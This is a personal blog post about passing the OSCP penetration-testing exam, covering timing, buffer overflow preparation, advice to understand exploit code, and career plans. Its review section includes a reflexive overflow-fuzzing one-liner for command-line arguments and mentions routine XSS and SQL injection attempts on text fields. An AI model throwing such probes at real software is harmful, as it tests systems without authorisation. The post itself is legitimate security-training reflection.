Hello again friends. This post is the fourth (and hopefully final) post of my small series of OSCP blogs discussing my progress and thoughts while taking part in the course. If you haven’t gotten a chance to check out my previous posts, you can find them here. This post will take a slightly different format compared to the others, since this post will be discussing my experience taking the exam (which was July 14th, two days ago).
If you read my previous post from last week, you may remember me saying that I did not expect to pass my first exam attempt. I was actively treating it as a “test run” for the real deal later in August, and as such wasn’t too emotionally invested in passing it the first time. I of course wanted to pass, but I did not go in with the expectation of doing so. Much to my surprise, though, I was able to obtain root/admin access on all 5 exam machines. With this, assuming my submitted report isn’t completely terrible, I should have the certification nailed. Without getting too “deep” and emotional, the moment I passed the 70 point threshold was the first time in a while that I was truly proud of myself.
The OSCP is a beginner certification. Getting it does not mean that you’re a talented hacker, or that you’re destined for greatness in the field. It does, however, solidify the notion that you can at least handle yourself in this very difficult industry, and you have the footing you need to start climbing the ladder. Having that self-assurance is a wonderful feeling, and it just makes you want to jump right back into the game.
The “Specifics” of the Exam (not really)
Obviously, due to non-disclosure agreements and what not, I can’t say too much regarding what I actually faced on the exam. I can, however, describe the general path I took, and some of the setbacks and advantages I found myself having. What made me “proud” of my exam attempt wasn’t just the fact that I owned all the boxes; it was the speed and methodology I demonstrated (sorry that sounded so gloatful, I don’t know how else to word it). My exam started at 6:00PM Sunday night; By 11:30PM, I terminated the exam VPN. The total time of my attempt was around 5 and a half hours, however the last hour or so was walking through each machine again to verify I had video footage and screenshots of the entire process. I had enough points to pass at around 9:30PM, and had rooted all the boxes by 10:30PM.
In my previous posts, I mentioned that time was my biggest concern; I confidently stated that if students were given a week instead of only 24 hours, most people would be able to pass. So, it was quite pleasing to see how little time came into play. There were certainly a number of elements contributing to this; much of it luck, but much of it solid preparation as well. One of the biggest contributors to my short completion time was my preparation for the buffer overflow. In my last post, I said that my buffer overflow practice times were sub-25 minutes, and that trend continued into my exam. The Buffer Overflow portion of the exam took me roughly 30 minutes, and I had absolutely no hiccups or issues during the process. Grabbing 25 points basically for free in the first 30 minutes is so crucial to passing the exam, and I’m very happy that I put in the preparation I did for the buffer overflow.
As for the other four boxes, I ran into very few issues enumerating, exploiting and establishing access. The most difficult part for me by far was the privilege escalation of the 25 point box; I didn’t dive into this part until I had enough points to pass from exploiting the other three boxes. Much to my surprise, I found the initial access portion of the other boxes to be more difficult than the privilege escalation portion. I think I got super lucky though, because the privilege escalation vectors were all things that I was pretty familiar with and comfortable doing. Had this not been the case, my exam results may have been a different story.
Any Advice for us?
Yes, read. Read every exploit you run. You can tell just from the lab environment alone that Offensive Security LOVES making students modify public proof of concept code to make things work; and for good reason. If you’re the type of person who grabs a piece of code and runs it without thinking, you will fail this exam. In both my lab time and my exam, there were so many cases where slight modifications to exploit code had to be made. Neglecting to do so will make you miss out on perfectly valid attack vectors. Every exploit I ran I knew EXACTLY what it was doing; I knew why the target was vulnerable, I knew conceptually how to exploit the vulnerability, and I knew how the exploit code I had was turning that conceptual exploitation into action. If you’re running an exploit without at the VERY least understanding what’s going on conceptually, you’re selling yourself short and it will eventually come back to bite you. Not only that, but debugging and fixing potential issues with the exploit code will be a near impossible task if you have no idea what’s going on.
What’s next for you?
I have no idea. Well, I have some ideas, but not really. For many, including myself, the OSCP is thought to be the gateway to the red team/pentesting world. Because of this, all your time before taking the OSCP is dedicated to preparing FOR the OSCP; that’s why I did HackTheBox, that’s why I did Vulnhub, that’s why I did everything. The OSCP was my target, and it has been for a while. Now that I have potentially crossed that gateway, I’m sort of in this state of not knowing what to do next. Life is so much easier when there are tangible, defined goals to reach; that’s why certifications can be so helpful in starting your career. However, now that a lot of the entry level stuff is over for me, my goals are becoming less and less defined. One tangible goal I want to achieve is having an official CVE to my name. For the big wigs in the industry, I’m sure having a CVE with your name on it is mundane and a bit uninspiring. However, as a fresh new idiot coming into the industry, I would love to see my name on the Mitre website for finding a vulnerability. The problem is, where do I start? Where should I even go to look for vulnerable applications? Should I target web apps or binaries? What even is the process for registering a CVE? Am I even close to competent enough to find vulnerabilities? As you can see, achieving this goal is a lot more nuanced and opaque than the goal of “own the 5 OSCP Exam systems.”
I would also like to say, and I mentioned this in a previous post, that my experience taking the OSCP has shifted my overall career aspirations in a direction I did not expect. Before taking the OSCP, I was all about the operational side of things. Command & Control frameworks, OPSEC, network pivoting, covert infrastructure; these were the sort of things I was interested in. The idea of exploit development or bug hunting felt very “slow” and stylistically not for me. I was perfectly content letting the smarter people discover these obscure bugs, and write these beautiful exploits for me; you exploit devs can craft the weapons, I just want to pull the trigger. However, throughout the OSCP I’ve felt an internal shift pushing me to think more about what role I really want to play in the industry.
To put it simply, I fell in love with reading and understanding exploit code. Prior to the OSCP, I was very much a “fire and forget” type of person: the very same type of person I criticized in the last section. However, the OSCP pushed me to start taking a peek into what’s really going on in these exploits, and I’ve been hooked ever since. Finding a vulnerability and writing a PoC exploit for it, a process that months ago would have bored me, now has me intrigued to no end. Running a sophisticated red team operation is really cool, and I’m sure it is an immensely satisfying experience. You know what is probably even more satisfying though? Building exploits that enable hundreds of these red team operations to succeed; Finding and reporting vulnerabilities in applications, effectively safeguarding the thousands of people, companies and governments that may use said application; submitting a CVE that inevitably shows up in the threat intelligence feeds of thousands of SOC’s. Those sound pretty damn amazing.
So, in summary, I plan on dabbling much more in the vulnerability research and exploit development side of things. I will still remain active on platforms like HackTheBox and keep up my operational skills. However, I’m starting to get the sense that maybe my true calling is finding and building the rifle instead of firing it; I guess only time will tell.
Quick OSCP Review
There is a near unanimous agreement in the industry that the OSCP is one of the most respected certifications out there. That is not a coincidence, that is not an accident. The OSCP doesn’t just throw information at you like the CEH, Security+ or GSEC does. It doesn’t try to teach you how to be a hacker: it instead trains you to think like one. After you take the OSCP, you’ll find yourself looking at everything you do on a computer differently. You’ll started asking why things work the way they do, instead of just accepting that it does. You’ll naturally look for kinks in the armor instead of the shininess of its plating. Every text field you find will be instinctively faced with an XSS or SQL Injection attempt; every command line argument will be given $(python -c “print(‘A’ * 5000)”) at least once. If you have any aspirations of breaking into the security field, blue team or red, the OSCP will build you a foundation that will likely serve you well for your entire career. The OSCP isn’t the best certification in the industry because people say it is. The OSCP is the best certification in the industry because the OSCP is the best certification in the industry. Take the course.
So, that’s all I got. As usual, sorry for the grandioseness; proportionality has never been my strong suit. I hope these blog posts were informative, helpful or entertaining, and I genuinely appreciate all of you who followed along and expressed a genuine interest in my progress. Feel free to contact me on twitter if you have any questions. Thanks for reading 🙂
Discord Channel: https://discord.gg/CCZCJCu